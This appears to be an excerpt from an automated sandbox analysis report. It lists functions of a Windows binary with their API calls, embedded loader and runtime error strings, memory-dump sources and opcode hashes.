                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                                                                                                                                                                                • API String ID: 1662231829-3498232454
                                                                                                                                                                                                                • Opcode ID: 4b3c020fd13166d28c819a7d3267133a3eaacb6fee3cd099781d96b43d4de662
                                                                                                                                                                                                                • Instruction ID: 7429ab581c30251c70642dd34917d331fafb607c8ce6815cc18ee237ba6b4e4d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b3c020fd13166d28c819a7d3267133a3eaacb6fee3cd099781d96b43d4de662
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD319557B39B8281FA21EB21E5517FB5291AF98FC0F4444B1DB4EC26F6EE2CE5449A00
                                                                                                                                                                                                                Function 00007FF67A60DEB8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF67A60E16A,?,?,?,00007FF67A60DE5C,?,?,00000001,00007FF67A60DA79), ref: 00007FF67A60DF3D
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF67A60E16A,?,?,?,00007FF67A60DE5C,?,?,00000001,00007FF67A60DA79), ref: 00007FF67A60DF4B
                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF67A60E16A,?,?,?,00007FF67A60DE5C,?,?,00000001,00007FF67A60DA79), ref: 00007FF67A60DF75
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF67A60E16A,?,?,?,00007FF67A60DE5C,?,?,00000001,00007FF67A60DA79), ref: 00007FF67A60DFBB
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF67A60E16A,?,?,?,00007FF67A60DE5C,?,?,00000001,00007FF67A60DA79), ref: 00007FF67A60DFC7
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                • Opcode ID: 9872d352a920fe7d45116cdfab482bad5ae926fb7a0a3cc3bdcd692ff81b7137
                                                                                                                                                                                                                • Instruction ID: 1474da1610a0a45c93a8313ec59cc3eac9096d81434b189e6e164648065eed36
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9872d352a920fe7d45116cdfab482bad5ae926fb7a0a3cc3bdcd692ff81b7137
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3318522A3B742D5EA119F22A800A772394FF48FA4F594675DE1E977A0DE3CE4959300
                                                                                                                                                                                                                Function 00007FF67A608BE0 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 68COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF67A602ABB), ref: 00007FF67A608C1A
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A6029E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF67A6088F2,?,?,?,?,?,?,?,?,?,?,?,00007FF67A60101D), ref: 00007FF67A602A14
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A6029E0: MessageBoxW.USER32 ref: 00007FF67A602AF0
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF67A602ABB), ref: 00007FF67A608CA0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                                                                                • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                                                                                                                • API String ID: 3723044601-876015163
                                                                                                                                                                                                                • Opcode ID: 887d82444744575df418bfd41b6e48fc3edc0b171f656e4d5f6c7ee70eb32595
                                                                                                                                                                                                                • Instruction ID: edf05ab997e448000ab98812e5315817e18ab535e336a77519e973d9ebc8a660
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 887d82444744575df418bfd41b6e48fc3edc0b171f656e4d5f6c7ee70eb32595
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF216223B29A4281EB50DB2AF84016BA361FF88FC4B584575DB5CC7BB9EF6CD5819700
                                                                                                                                                                                                                Function 00007FF67A61B810 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                • Opcode ID: 139d7bc547cb1cb8962b7901dc7ecb8c361af24a82b12e2272b260804a9b77c7
                                                                                                                                                                                                                • Instruction ID: f96a1f081ebd6bb951f0011ebb6ea75cfb0560863a2b12b441d9a5ba8f6dba44
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 139d7bc547cb1cb8962b7901dc7ecb8c361af24a82b12e2272b260804a9b77c7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 12219223E2C64281FAA46771D65117B2A829F44FB0F5447B5DA3EC66FADE2CB4017341
                                                                                                                                                                                                                Function 00007FF67A6286BC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                • String ID: CONOUT$
                                                                                                                                                                                                                • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                • Opcode ID: dc1a3cb66a96e2c92b05876df44f34e6b44b08b84d7dcdae92150d4fed606b6a
                                                                                                                                                                                                                • Instruction ID: 3e350f231fa74a1e580fe3435c0c17f5b9c9172bc739ccfcf313a3c314f006e8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc1a3cb66a96e2c92b05876df44f34e6b44b08b84d7dcdae92150d4fed606b6a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F118126A28B5286E7518F52E85432A62A0FB88FE4F044274DA6EC77F4CF7CE4458740
                                                                                                                                                                                                                Function 00007FF67A61B988 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF67A6155CD,?,?,?,?,00007FF67A61F2BF,?,?,00000000,00007FF67A61BAA6,?,?,?), ref: 00007FF67A61B997
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF67A6155CD,?,?,?,?,00007FF67A61F2BF,?,?,00000000,00007FF67A61BAA6,?,?,?), ref: 00007FF67A61B9CD
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF67A6155CD,?,?,?,?,00007FF67A61F2BF,?,?,00000000,00007FF67A61BAA6,?,?,?), ref: 00007FF67A61B9FA
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF67A6155CD,?,?,?,?,00007FF67A61F2BF,?,?,00000000,00007FF67A61BAA6,?,?,?), ref: 00007FF67A61BA0B
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF67A6155CD,?,?,?,?,00007FF67A61F2BF,?,?,00000000,00007FF67A61BAA6,?,?,?), ref: 00007FF67A61BA1C
                                                                                                                                                                                                                • SetLastError.KERNEL32(?,?,?,00007FF67A6155CD,?,?,?,?,00007FF67A61F2BF,?,?,00000000,00007FF67A61BAA6,?,?,?), ref: 00007FF67A61BA37
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                • Opcode ID: 312b5f2dcd4511434fc9e888aff7e7a4818cf3686b871577b38ae952f3f4b727
                                                                                                                                                                                                                • Instruction ID: 2a9d037648f12e4bd3b2bda7ed84cb0b9285c3a04b3a26dc59a0696aa9603c71
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 312b5f2dcd4511434fc9e888aff7e7a4818cf3686b871577b38ae952f3f4b727
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D119023E2C74282FA14A731D64117B29929F44FB0F4447B5EA7EC67FADE2CB4026200
                                                                                                                                                                                                                Function 00007FF67A60D878 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                • String ID: csm$f
                                                                                                                                                                                                                • API String ID: 2395640692-629598281
                                                                                                                                                                                                                • Opcode ID: 693f609b9fae876419381cc446d630854629708ee6e32f1efd9795666748e69d
                                                                                                                                                                                                                • Instruction ID: b97e1c77a06ec00afae7a34d0ccbfb263dc62665cdaf8c0e3a0d017c6bdca070
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 693f609b9fae876419381cc446d630854629708ee6e32f1efd9795666748e69d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30519133A3A602CADB14DB15D404E2B3795FB80F98F518270DB5E87798EF38E981A704
                                                                                                                                                                                                                Function 00007FF67A602600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                • String ID: Unhandled exception in script
                                                                                                                                                                                                                • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                • Opcode ID: dc070d28aa34fb62a8c81eb4f66bc8c41d302b2675cd07858098f6061cbf7ad4
                                                                                                                                                                                                                • Instruction ID: 1618cde3d39216e9879b8bb1b58ce0fa68fe3e0bb9b24974e12121efb5d2739d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc070d28aa34fb62a8c81eb4f66bc8c41d302b2675cd07858098f6061cbf7ad4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8531A273628A8288EB20DF25E8515FB6360FF88B84F400175EA4D8BBA9DF3CD144D700
                                                                                                                                                                                                                Function 00007FF67A6029E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF67A6088F2,?,?,?,?,?,?,?,?,?,?,?,00007FF67A60101D), ref: 00007FF67A602A14
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A608570: GetLastError.KERNEL32(00000000,00007FF67A602A5E,?,?,?,?,?,?,?,?,?,?,?,00007FF67A60101D), ref: 00007FF67A608597
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A608570: FormatMessageW.KERNEL32 ref: 00007FF67A6085C6
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A608BE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF67A602ABB), ref: 00007FF67A608C1A
                                                                                                                                                                                                                • MessageBoxW.USER32 ref: 00007FF67A602AF0
                                                                                                                                                                                                                • MessageBoxA.USER32 ref: 00007FF67A602B0C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                                                                                                                                                                                • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                                                                                • API String ID: 2806210788-2410924014
                                                                                                                                                                                                                • Opcode ID: 17bde7baa48798fc9044701dc9e2f5590094afa9c40027f5b89001a931553ba1
                                                                                                                                                                                                                • Instruction ID: dadfc95a2adbfeb7d7bd0ad8781c25d166267e52a08d18e1613d3047355a4955
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17bde7baa48798fc9044701dc9e2f5590094afa9c40027f5b89001a931553ba1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 96310F73638A8291E630DB10E4516EB6364FF84B84F404176EA8D86AA9DF3CD645DB40
                                                                                                                                                                                                                Function 00007FF67A61A118 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                • Opcode ID: 6d37f3dc48988a17a5a16ca308b3de1e776b5d3bd2cbadce22e8a62f3d793b7e
                                                                                                                                                                                                                • Instruction ID: 67271ec53566b1d2f5d23df2be2b93ec8ecc206e931cb79861d8b22abd69c04f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d37f3dc48988a17a5a16ca308b3de1e776b5d3bd2cbadce22e8a62f3d793b7e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4F04F62A2970281EB108B64E84537B5320EF59F71F541275C56E861F4CF2CE445A350
                                                                                                                                                                                                                Function 00007FF67A629D40 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                • Opcode ID: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                                                                                                                                                • Instruction ID: e889cfcc7a661dcccfedafa9bca9bf87dab6471c9b7ebe79003bf5a6a643bf6b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC115137E3CE0301F7549968E44637718416FD5B70F080AB4FA6E862FAEE6CE9457104
                                                                                                                                                                                                                Function 00007FF67A61BA50 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,00007FF67A61AC67,?,?,00000000,00007FF67A61AF02,?,?,?,?,?,00007FF67A6131CC), ref: 00007FF67A61BA6F
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF67A61AC67,?,?,00000000,00007FF67A61AF02,?,?,?,?,?,00007FF67A6131CC), ref: 00007FF67A61BA8E
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF67A61AC67,?,?,00000000,00007FF67A61AF02,?,?,?,?,?,00007FF67A6131CC), ref: 00007FF67A61BAB6
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF67A61AC67,?,?,00000000,00007FF67A61AF02,?,?,?,?,?,00007FF67A6131CC), ref: 00007FF67A61BAC7
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF67A61AC67,?,?,00000000,00007FF67A61AF02,?,?,?,?,?,00007FF67A6131CC), ref: 00007FF67A61BAD8
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                • Opcode ID: f70ee7c89560e3a3f945a0093c6d62eaa63281c746b4319ca03f88377ac2e8f0
                                                                                                                                                                                                                • Instruction ID: 23c95d5475a511ec26316816984eb2c93af687c686dd194889174dd5f0405c0d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f70ee7c89560e3a3f945a0093c6d62eaa63281c746b4319ca03f88377ac2e8f0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B117F23E2864241FA589776D55117B2991DF44FB0F4483B9E97DC67FADE6CA402A300
                                                                                                                                                                                                                Function 00007FF67A61B8E4 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                • Opcode ID: 3273ad673f3a21db5857e5805e11896850ae06cc08c5864d6916b14b2a868b9d
